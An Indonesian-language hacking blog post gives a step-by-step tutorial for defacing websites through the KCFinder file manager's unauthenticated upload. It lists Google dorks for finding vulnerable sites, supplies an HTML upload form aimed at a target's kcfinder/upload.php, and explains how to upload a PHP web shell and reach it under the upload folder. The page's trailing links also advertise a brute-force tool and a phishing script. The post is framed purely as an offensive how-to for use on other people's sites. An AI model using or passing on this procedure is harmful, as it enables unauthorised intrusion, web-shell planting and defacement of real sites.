Deface poc KCFINDER

byCukimay Cyber Team -October 29, 2018

Deface KCFINDER

GW BALIK LAGI NEH, Mastah minggir :v

KALI INI GW BAKALAN AJARIN DEFACE LAGI DENGAN METODE

KCFINDER :)

OK BAHAN YANG DI PERLUKAN :

-PC/ANDROID

-KONEKSI INTERNET DAN BROWSER

-DORK :

*inurl:/asset/kcfinder

*sites/all/modules/civicrm/packages/kcfinder

*inurl:templates/_editor/kcfinder/

*inurl:includes/kcfinder/browse.php

*inurl:/kcfinder/browse.php

*lib/kcfinder/files/upload

*admin/kcfinder/files/upload

*panel/kcfinder/upload/files

*editor/kcfinder/upload

*Kcfinder/upload/files

*inurl:/panel/kcfinder/ ext:png

-CSRF
<form method="POST" action="http://target.nya/path/kcfinder/upload.php"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>~/ nnd</button>
</form>

OK IKUTI LANGKAH SAYA YAA :)

1.DORKING DI GOOGLE.

2.PILIH TARGET LALU BUKA LINK TARGET.

3.TAMBAHKAN upload.php DI BELAKANG kcfinder/.

4.JIKA VULN MAKA AKAN MUNCUL

Unknown Error

5.MASUKAN LINKNYA KE CSRF.

6. BUKA CSRFNYA.

7.KLIK CHOOSE FILE.

8.PILIH SHELL YANG SUDAH KALIAN DOWNLOAD TADI.

9.KLIK UPLOAD.

10.JIKA BERHASIL DI UPLOAD MAKA AKAN MUNCUL PESAN KOSONG.

CARA MENGAKSES FILE SHELLNYA ADALAH :

kcfinder/upload/files/wqe.php5 [wqe.php5 ADALAH NAMA SHELL SAYA]

TADAAAA SAYA TELAH BERHASIL MENGUPLOAD SHELL :D

SAYA RASA SEKIAN TUTORIAL KALI INI :D SAMPAI JUMPA DI TUTORIAL BERIKUTNYA YA BRO :D

Tags DEFACE

Trending

Deface poc Wp Add Admin

Cara deface Wp ghost Theme

8 Rekomendasi Cloud Storage Gratis Terbaik Ditahun 2021

XML-RPC BRUTE FORCE V.2.9.16 Free Download

SCRIPT WEB PH1SING PUBG MIDASBUY SEASON 23 TERBARU - FREE DOWNLOAD